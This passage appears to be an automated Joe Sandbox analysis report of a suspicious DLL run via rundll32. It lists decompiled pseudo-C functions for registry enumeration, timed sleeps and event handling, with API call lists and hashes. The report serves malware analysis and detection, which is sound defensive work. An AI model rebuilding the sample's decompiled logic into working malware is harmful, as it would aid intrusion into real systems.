                                      0x04de2582
                                      0x04de2591
                                      0x04de2596
                                      0x04de25a3
                                      0x04de25ac
                                      0x04de25b7
                                      0x04de25be
                                      0x04de25c2
                                      0x04de25c2
                                      0x04de2577
                                      0x04de25cd
                                      0x04de25d4

                                      APIs
                                      • lstrlen.KERNEL32(7705F710,?,00000000,?,7705F710), ref: 04DE2541
                                      • StrStrA.SHLWAPI(00000000,?), ref: 04DE254E
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE256D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeaplstrlen
                                      • String ID: FNwPq
                                      • API String ID: 556738718-3591455833
                                      • Opcode ID: cb709af536a24274b497fee9cc78b9192c67be9ce724306771b490acf0111c17
                                      • Instruction ID: d690b7aa0db3867367fede7421c48d7fa2a9c0df46f965420629f2f70198bf80
                                      • Opcode Fuzzy Hash: cb709af536a24274b497fee9cc78b9192c67be9ce724306771b490acf0111c17
                                      • Instruction Fuzzy Hash: 32215E3660020AAFDB11EF69C994BAEBFB9EF85314F148191EC44AB305D735E915CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE1000 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(80000002), ref: 04DE105D
                                      • SysAllocString.OLEAUT32(04DE6ECE), ref: 04DE10A1
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE10B5
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE10C3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: 13114f0dadd8fded86f5b6ee92e81db45a9c6b3d83774b0dd22723a6eb282b74
                                      • Instruction ID: ae3d0a4dc5786d51edd0c0cdb350239185028685c933371260d16e32058338b2
                                      • Opcode Fuzzy Hash: 13114f0dadd8fded86f5b6ee92e81db45a9c6b3d83774b0dd22723a6eb282b74
                                      • Instruction Fuzzy Hash: 39312171B00259EFCB15EF99D4909BE7BB9FF48300B10841EF9069B250D735AA41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE737F Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE737F(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04DE4DF6(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E04DE4C73(_v28);
							goto L17;
						}
						_t42 = E04DE6E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E04DE4C73(_v24);
						_v20 = _v16;
						_t47 = E04DE4DF6(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x4dea30c, 0) == 0x102);
				goto L16;
			}

















                                      0x04de737f
                                      0x04de7399
                                      0x04de739c
                                      0x04de739f
                                      0x04de73a2
                                      0x04de73a5
                                      0x04de73ab
                                      0x04de73af
                                      0x04de7489
                                      0x04de748d
                                      0x04de748d
                                      0x04de73b8
                                      0x04de73bf
                                      0x04de73c4
                                      0x04de73c9
                                      0x04de747e
                                      0x04de7481
                                      0x00000000
                                      0x04de7487
                                      0x04de73cf
                                      0x04de73d2
                                      0x04de73d9
                                      0x04de73e3
                                      0x04de73ec
                                      0x04de73f2
                                      0x04de73fa
                                      0x04de7432
                                      0x04de746c
                                      0x04de7472
                                      0x04de7474
                                      0x04de7474
                                      0x04de7476
                                      0x04de7479
                                      0x00000000
                                      0x04de7479
                                      0x04de7447
                                      0x04de744c
                                      0x04de7450
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de7450
                                      0x04de73ff
                                      0x04de740e
                                      0x00000000
                                      0x00000000
                                      0x04de7413
                                      0x04de741c
                                      0x04de741f
                                      0x04de7424
                                      0x04de7429
                                      0x04de7404
                                      0x04de7404
                                      0x00000000
                                      0x04de7404
                                      0x04de742d
                                      0x00000000
                                      0x04de742d
                                      0x04de7401
                                      0x00000000
                                      0x04de7452
                                      0x04de745f
                                      0x00000000

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE73A5
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • RegEnumKeyExA.KERNEL32(?,?,?,04DE2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04DE2A82), ref: 04DE73EC
                                      • WaitForSingleObject.KERNEL32(00000000,?,?,?,04DE2A82,?,04DE2A82,?,?,?,?,?,04DE2A82,?), ref: 04DE7459
                                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE7481
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                      • String ID:
                                      • API String ID: 3664505660-0
                                      • Opcode ID: 34ff792123686a3a585ac8b62893f27cceef6063db0e12dfce9717bf02fa474c
                                      • Instruction ID: 83ff28df0eec3cce5fbaa1ae9cca1057b15ae6b17a9679c5fdddd66f62a68e15
                                      • Opcode Fuzzy Hash: 34ff792123686a3a585ac8b62893f27cceef6063db0e12dfce9717bf02fa474c
                                      • Instruction Fuzzy Hash: 38314971D00119ABDF22BFAAD8448FFFFB9FB84310F108126E951B6260D2746A40DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE29F2 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 41%
                                      			E04DE29F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E04DE6174(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04DE75C6(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04DE6955(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4dea34c, 1, 0,  *0x4dea3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04DE737F(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04DE6E20(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04DE5147(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04DE1666( &_v32, _t39);
					goto L13;
				}
			}














                                      0x04de29f2
                                      0x04de29ff
                                      0x04de2a05
                                      0x04de2a06
                                      0x04de2a07
                                      0x04de2a08
                                      0x04de2a09
                                      0x04de2a0d
                                      0x04de2a14
                                      0x04de2a19
                                      0x04de2a1d
                                      0x04de2aa5
                                      0x04de2aa5
                                      0x04de2aa8
                                      0x04de2aaa
                                      0x04de2ab2
                                      0x04de2ab8
                                      0x04de2abb
                                      0x04de2abb
                                      0x04de2ab8
                                      0x04de2ac6
                                      0x04de2ac6
                                      0x04de2a29
                                      0x04de2a30
                                      0x04de2a32
                                      0x04de2a32
                                      0x04de2a49
                                      0x04de2a4d
                                      0x04de2a50
                                      0x04de2a5b
                                      0x04de2a62
                                      0x04de2a62
                                      0x04de2a6b
                                      0x04de2a6f
                                      0x04de2a7d
                                      0x04de2a71
                                      0x04de2a71
                                      0x04de2a72
                                      0x04de2a73
                                      0x04de2a74
                                      0x04de2a75
                                      0x04de2a76
                                      0x04de2a76
                                      0x04de2a82
                                      0x04de2a85
                                      0x04de2a89
                                      0x04de2a8b
                                      0x04de2a8b
                                      0x04de2a92
                                      0x00000000
                                      0x04de2a94
                                      0x04de2a94
                                      0x04de2aa1
                                      0x00000000
                                      0x04de2aa1

                                      APIs
                                      • CreateEventA.KERNEL32(04DEA34C,00000001,00000000,00000040,?,?,7705F710,00000000,7705F730), ref: 04DE2A43
                                      • SetEvent.KERNEL32(00000000), ref: 04DE2A50
                                      • Sleep.KERNEL32(00000BB8), ref: 04DE2A5B
                                      • CloseHandle.KERNEL32(00000000), ref: 04DE2A62
                                        • Part of subcall function 04DE737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE73A5
                                        • Part of subcall function 04DE737F: RegEnumKeyExA.KERNEL32(?,?,?,04DE2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04DE2A82), ref: 04DE73EC
                                        • Part of subcall function 04DE737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,04DE2A82,?,04DE2A82,?,?,?,?,?,04DE2A82,?), ref: 04DE7459
                                        • Part of subcall function 04DE737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE7481
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                      • String ID:
                                      • API String ID: 891522397-0
                                      • Opcode ID: 311386779caf037cad9f13c4a4527e917f11531a5f2ab09df94ce21d7e6d70ee
                                      • Instruction ID: 7b495b60e7e36c1d8b190012cd1c0b583dd8a86f7e5139f402b8e4b4a8c7083c
                                      • Opcode Fuzzy Hash: 311386779caf037cad9f13c4a4527e917f11531a5f2ab09df94ce21d7e6d70ee
                                      • Instruction Fuzzy Hash: 2E2195B2E00219ABDF20BFE7C8848FE77ADFF48354B4444A5EA11A7100D774BA459B70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4E0B Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE4E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04DE4DF6(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E04DE4C73(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E04DE7849(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                      0x04de4e17
                                      0x04de4e3a
                                      0x04de4e44
                                      0x04de4e4a
                                      0x04de4e4e
                                      0x04de4e66
                                      0x04de4e6b
                                      0x04de4eb3
                                      0x04de4e6d
                                      0x04de4e75
                                      0x04de4e79
                                      0x04de4eb0
                                      0x04de4e7b
                                      0x04de4e8d
                                      0x04de4e91
                                      0x04de4ea7
                                      0x04de4e93
                                      0x04de4e96
                                      0x04de4e98
                                      0x04de4e9d
                                      0x04de4ea2
                                      0x04de4ea2
                                      0x04de4e9d
                                      0x04de4e91
                                      0x04de4e79
                                      0x04de4ebb
                                      0x04de4ebb
                                      0x04de4ec2
                                      0x04de4ec8
                                      0x04de4ec8
                                      0x04de4e30
                                      0x04de4e34
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • RegOpenKeyW.ADVAPI32(80000002,054A9EC2,054A9EC2), ref: 04DE4E44
                                      • RegQueryValueExW.KERNEL32(054A9EC2,?,00000000,80000002,00000000,00000000,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2,80000002), ref: 04DE4E66
                                      • RegQueryValueExW.ADVAPI32(054A9EC2,?,00000000,80000002,00000000,00000000,00000000,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2), ref: 04DE4E8B
                                      • RegCloseKey.KERNEL32(054A9EC2,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2,80000002,00000000,?), ref: 04DE4EBB
                                        • Part of subcall function 04DE7849: SafeArrayDestroy.OLEAUT32(00000000), ref: 04DE78D1
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                      • String ID:
                                      • API String ID: 486277218-0
                                      • Opcode ID: 246d0d52dcf9ffbba867ba705c1995a87a9b356282224ef75d161c76a1dad133
                                      • Instruction ID: d647195dcfe427df8efd9175e0ccb65f0cd4b2c46159f994717105d0b7809464
                                      • Opcode Fuzzy Hash: 246d0d52dcf9ffbba867ba705c1995a87a9b356282224ef75d161c76a1dad133
                                      • Instruction Fuzzy Hash: 8421597350011ABFDF21AE96DD808FE7BA9FB08754B018025FE049B220D631AD60ABA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE39B5 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 65%
                                      			E04DE39B5(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L04DE8326();
					_t34 = _t16 + _t13;
					_t18 = E04DE54D5(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                                      0x04de39ba
                                      0x04de39c5
                                      0x04de39c6
                                      0x04de39c6
                                      0x04de39d2
                                      0x04de39db
                                      0x04de39de
                                      0x04de39e2
                                      0x04de39e4
                                      0x04de39e9
                                      0x04de39ea
                                      0x04de39eb
                                      0x04de39f5
                                      0x04de39f8
                                      0x04de39ff
                                      0x04de3a03
                                      0x04de3a0a
                                      0x04de3a10
                                      0x04de3a1a

                                      APIs
                                      • SwitchToThread.KERNEL32(?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE39C6
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE39D2
                                      • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04DE39EB
                                        • Part of subcall function 04DE54D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04DE5534
                                      • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE3A0A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                      • String ID:
                                      • API String ID: 1610602887-0
                                      • Opcode ID: 4c56a4ff33aed0b36c52cd4d927bbd6fbbcff538dab9e9eab44a6301dddab106
                                      • Instruction ID: ca32f8b7ffeb3e8b57277fb74f93c54e577d8c41b09404dbb198644c44c721f6
                                      • Opcode Fuzzy Hash: 4c56a4ff33aed0b36c52cd4d927bbd6fbbcff538dab9e9eab44a6301dddab106
                                      • Instruction Fuzzy Hash: 12F0A4B3B00204BBD714AAA5DC2DBEE77B9DB84365F150164F602E7340E678AA008660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE68F5 Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E04DE68F5(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4dea3cc; // 0x54a95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4dea3cc; // 0x54a95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4dea030) {
					HeapFree( *0x4dea2d8, 0, _t8);
				}
				_t9 = E04DE4117(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4dea3cc; // 0x54a95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                      0x04de68f5
                                      0x04de68f5
                                      0x04de68fe
                                      0x04de690e
                                      0x04de690e
                                      0x04de6913
                                      0x04de6918
                                      0x00000000
                                      0x00000000
                                      0x04de6908
                                      0x04de6908
                                      0x04de691a
                                      0x04de691e
                                      0x04de6930
                                      0x04de6930
                                      0x04de693b
                                      0x04de6940
                                      0x04de6943
                                      0x04de6948
                                      0x04de694c
                                      0x04de6952

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE68FE
                                      • Sleep.KERNEL32(0000000A), ref: 04DE6908
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6930
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE694C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 3a0318b1df8816ba7e6940ce00bae658326eee79d9ee1e7874f9bab1fe7c4dcb
                                      • Instruction ID: 63e5378edcdff5b6c3e0f778e9ded108c901026136da215b4e791d5e759a971f
                                      • Opcode Fuzzy Hash: 3a0318b1df8816ba7e6940ce00bae658326eee79d9ee1e7874f9bab1fe7c4dcb
                                      • Instruction Fuzzy Hash: 2EF05E703012429BEB20BFA7DD68F263BE4EB21740B454040F641DA351C224EC50DB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE67E2 Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE67E2(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04DE6955(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4dea348; // 0x6bd5a8
				_t4 = _t24 + 0x4debe30; // 0x54a93d8
				_t5 = _t24 + 0x4debdd8; // 0x4f0053
				_t26 = E04DE427E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4dea348; // 0x6bd5a8
						_t11 = _t32 + 0x4debe24; // 0x54a93cc
						_t48 = _t11;
						_t12 = _t32 + 0x4debdd8; // 0x4f0053
						_t52 = E04DE6203(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4dea348; // 0x6bd5a8
							_t13 = _t35 + 0x4debe6e; // 0x30314549
							_t37 = E04DE13F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4dea2fc - 6;
								if( *0x4dea2fc <= 6) {
									_t42 =  *0x4dea348; // 0x6bd5a8
									_t15 = _t42 + 0x4debdba; // 0x52384549
									E04DE13F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4dea348; // 0x6bd5a8
							_t17 = _t38 + 0x4debe68; // 0x54a9410
							_t18 = _t38 + 0x4debe40; // 0x680043
							_t40 = E04DE3B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x4dea2d8, 0, _t52);
						}
					}
					HeapFree( *0x4dea2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04DE5147(_t54);
				}
				return _t45;
			}




















                                      0x04de67e2
                                      0x04de67f2
                                      0x04de67f5
                                      0x04de67fc
                                      0x04de67fe
                                      0x04de67fe
                                      0x04de6801
                                      0x04de6806
                                      0x04de680d
                                      0x04de681a
                                      0x04de681f
                                      0x04de6823
                                      0x04de6831
                                      0x04de683f
                                      0x04de6843
                                      0x04de68d4
                                      0x04de68d4
                                      0x04de6849
                                      0x04de6849
                                      0x04de684e
                                      0x04de684e
                                      0x04de6855
                                      0x04de6861
                                      0x04de6863
                                      0x04de6865
                                      0x04de6867
                                      0x04de686e
                                      0x04de6879
                                      0x04de6880
                                      0x04de6882
                                      0x04de6889
                                      0x04de688b
                                      0x04de6892
                                      0x04de689d
                                      0x04de689d
                                      0x04de6889
                                      0x04de68a2
                                      0x04de68a7
                                      0x04de68ae
                                      0x04de68be
                                      0x04de68cc
                                      0x04de68ce
                                      0x04de68ce
                                      0x04de6865
                                      0x04de68e0
                                      0x04de68e0
                                      0x04de68e2
                                      0x04de68e7
                                      0x04de68e9
                                      0x04de68e9
                                      0x04de68f4

                                      APIs
                                      • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,054A93D8,00000000,?,7705F710,00000000,7705F730), ref: 04DE6831
                                      • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,054A9410,?,00000000,30314549,00000014,004F0053,054A93CC), ref: 04DE68CE
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04DE6BB4), ref: 04DE68E0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: eb698f4ce875718c44fef1dd16c5094f6fa85f9b36313e1bd988726078e1a494
                                      • Instruction ID: 2d1bbb0c3f6a1f5aaf67826a47153b684110995b5cfbace8524d01a7330b2bb8
